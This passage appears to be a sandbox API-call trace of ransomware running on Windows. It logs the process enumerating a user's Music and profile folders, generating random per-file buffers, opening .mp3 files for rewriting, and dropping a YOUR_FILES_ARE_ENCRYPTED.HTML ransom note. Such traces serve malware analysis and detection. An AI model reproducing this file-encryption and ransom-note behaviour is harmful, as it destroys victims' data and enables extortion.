(lpString1="vENfC-vF_q47b2P1dmc.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.110] PathFindExtensionW (pszPath="vENfC-vF_q47b2P1dmc.mp3") returned=".mp3" [0168.110] lstrlenW (lpString=".mp3") returned 4 [0168.110] PathFindExtensionW (pszPath="vENfC-vF_q47b2P1dmc.mp3") returned=".mp3" [0168.110] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\vENfC-vF_q47b2P1dmc.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\venfc-vf_q47b2p1dmc.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0168.110] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=74394) returned 1 [0168.110] GetProcessHeap () returned 0x270000 [0168.110] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0168.115] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="C9") returned 2 [0168.115] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="0A") returned 2 [0168.115] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="57") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="4B") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="08") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="40") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="F0") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="03") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="F6") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="39") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | 
out: param_1="FB") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="20") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="63") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="08") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="61") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="4A") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="FE") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="BE") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="81") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="D8") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="FC") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="62") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="6D") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="D2") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="14") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="99") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="8D") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="20") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="0E") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="35") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="A9") returned 2 [0168.116] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="31") returned 2 [0168.117] lstrcpyW (in: 
lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\vENfC-vF_q47b2P1dmc.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\vENfC-vF_q47b2P1dmc.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\vENfC-vF_q47b2P1dmc.mp3" [0168.117] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.117] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0168.117] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71621130, ftCreationTime.dwHighDateTime=0x1d7d9fb, ftLastAccessTime.dwLowDateTime=0xa018ae00, ftLastAccessTime.dwHighDateTime=0x1d7da80, ftLastWriteTime.dwLowDateTime=0xa018ae00, ftLastWriteTime.dwHighDateTime=0x1d7da80, nFileSizeHigh=0x0, nFileSizeLow=0x14657, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Zn pdo0h3pIYzQ.mp3", cAlternateFileName="ZNPDO0~1.MP3")) returned 1 [0168.117] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\Zn pdo0h3pIYzQ.mp3") returned 48 [0168.117] lstrcmpW (lpString1="Zn pdo0h3pIYzQ.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0168.117] PathFindExtensionW (pszPath="Zn pdo0h3pIYzQ.mp3") returned=".mp3" [0168.117] lstrlenW (lpString=".mp3") returned 4 [0168.117] PathFindExtensionW (pszPath="Zn pdo0h3pIYzQ.mp3") returned=".mp3" [0168.117] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\Zn pdo0h3pIYzQ.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\zn pdo0h3piyzq.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, 
hTemplateFile=0x0) returned 0x598 [0168.118] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=83543) returned 1 [0168.118] GetProcessHeap () returned 0x270000 [0168.118] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0168.120] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="68") returned 2 [0168.120] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="EA") returned 2 [0168.120] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="0A") returned 2 [0168.120] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="18") returned 2 [0168.120] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="FB") returned 2 [0168.120] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="25") returned 2 [0168.120] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="B6") returned 2 [0168.120] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="66") returned 2 [0168.120] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="4E") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="23") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="CD") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="0B") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="38") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="D4") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="3D") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="F2") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="C5") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="58") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd8a, 
param_2="%02X" | out: param_1="4A") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="09") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="AD") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="FA") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="14") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="6D") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="E0") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="5A") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="F3") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="CF") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="EB") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="99") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="CE") returned 2 [0168.121] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="52") returned 2 [0168.122] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\Zn pdo0h3pIYzQ.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\Zn pdo0h3pIYzQ.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\Zn pdo0h3pIYzQ.mp3" [0168.122] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.122] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0168.122] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71621130, 
ftCreationTime.dwHighDateTime=0x1d7d9fb, ftLastAccessTime.dwLowDateTime=0xa018ae00, ftLastAccessTime.dwHighDateTime=0x1d7da80, ftLastWriteTime.dwLowDateTime=0xa018ae00, ftLastWriteTime.dwHighDateTime=0x1d7da80, nFileSizeHigh=0x0, nFileSizeLow=0x14657, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Zn pdo0h3pIYzQ.mp3", cAlternateFileName="ZNPDO0~1.MP3")) returned 0 [0168.122] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0168.122] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0168.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\music\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0168.123] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0168.124] CloseHandle (hObject=0x5a0) returned 1 [0168.125] GetProcessHeap () returned 0x270000 [0168.126] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.126] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0168.126] wnsprintfW (in: pszDest=0x74ea160, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\My Documents") returned 36 [0168.126] GetProcessHeap () returned 0x270000 [0168.126] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.126] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\My Documents" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\My Documents") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\My Documents" [0168.126] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\My Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\My Documents\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\My Documents\\*" [0168.126] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\My Documents\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71621130, ftCreationTime.dwHighDateTime=0x1d7d9fb, ftLastAccessTime.dwLowDateTime=0xa018ae00, ftLastAccessTime.dwHighDateTime=0x1d7da80, ftLastWriteTime.dwLowDateTime=0xa018ae00, ftLastWriteTime.dwHighDateTime=0x1d7da80, nFileSizeHigh=0x0, nFileSizeLow=0x14657, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Zn pdo0h3pIYzQ.mp3", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0168.126] GetProcessHeap () returned 0x270000 [0168.127] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.127] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NetHood", cAlternateFileName="")) returned 1 [0168.127] wnsprintfW (in: pszDest=0x74ea160, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\NetHood") returned 31 [0168.127] GetProcessHeap () returned 0x270000 [0168.127] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.127] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\NetHood" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\NetHood") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\NetHood" [0168.127] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\NetHood", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\NetHood\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\NetHood\\*" [0168.127] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\NetHood\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71621130, ftCreationTime.dwHighDateTime=0x1d7d9fb, ftLastAccessTime.dwLowDateTime=0xa018ae00, ftLastAccessTime.dwHighDateTime=0x1d7da80, ftLastWriteTime.dwLowDateTime=0xa018ae00, ftLastWriteTime.dwHighDateTime=0x1d7da80, nFileSizeHigh=0x0, nFileSizeLow=0x14657, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Zn pdo0h3pIYzQ.mp3", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0168.127] GetProcessHeap () returned 0x270000 [0168.128] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.128] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd23442d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaf243ac0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xaf9f4460, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0168.128] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\NTUSER.DAT") returned 34 [0168.128] lstrcmpW (lpString1="NTUSER.DAT", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.128] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0168.128] lstrlenW (lpString=".DAT") returned 4 [0168.128] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0168.128] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd263de50, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd263de50, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xaf9f4460, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0168.128] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\ntuser.dat.LOG1") returned 39 [0168.128] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.128] PathFindExtensionW (pszPath="ntuser.dat.LOG1") returned=".LOG1" [0168.128] lstrlenW (lpString=".LOG1") returned 5 [0168.129] PathFindExtensionW (pszPath="ntuser.dat.LOG1") returned=".LOG1" [0168.129] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd263de50, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd263de50, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd263de50, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0168.129] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\ntuser.dat.LOG2") returned 39 [0168.129] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.129] PathFindExtensionW (pszPath="ntuser.dat.LOG2") returned=".LOG2" [0168.129] lstrlenW (lpString=".LOG2") returned 5 [0168.129] PathFindExtensionW (pszPath="ntuser.dat.LOG2") returned=".LOG2" [0168.129] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2663fb0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2663fb0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xe9f99690, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0168.129] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf") returned 79 [0168.129] lstrcmpW (lpString1="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.129] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf") returned=".blf" [0168.129] lstrlenW (lpString=".blf") returned 4 [0168.129] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf") returned=".blf" [0168.129] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd268a110, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd268a110, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xe9f99690, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x80000, 
dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0168.129] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms") returned 116 [0168.129] lstrcmpW (lpString1="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.129] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0168.129] lstrlenW (lpString=".regtrans-ms") returned 12 [0168.129] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0168.129] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd26b0270, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26b0270, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xe9f99690, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0168.129] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms") returned 116 [0168.129] lstrcmpW (lpString1="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.129] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0168.129] lstrlenW (lpString=".regtrans-ms") returned 12 [0168.129] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0168.129] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd236a430, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b50453a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0168.129] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\ntuser.ini") returned 34 [0168.129] lstrcmpW (lpString1="ntuser.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.129] PathFindExtensionW (pszPath="ntuser.ini") returned=".ini" [0168.129] lstrlenW (lpString=".ini") returned 4 [0168.130] PathFindExtensionW (pszPath="ntuser.ini") returned=".ini" [0168.130] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad545d50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad545d50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad545d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0168.130] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive") returned 32 [0168.130] GetProcessHeap () returned 0x270000 [0168.130] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.130] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive" [0168.130] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive\\*" [0168.130] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad545d50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad545d50, 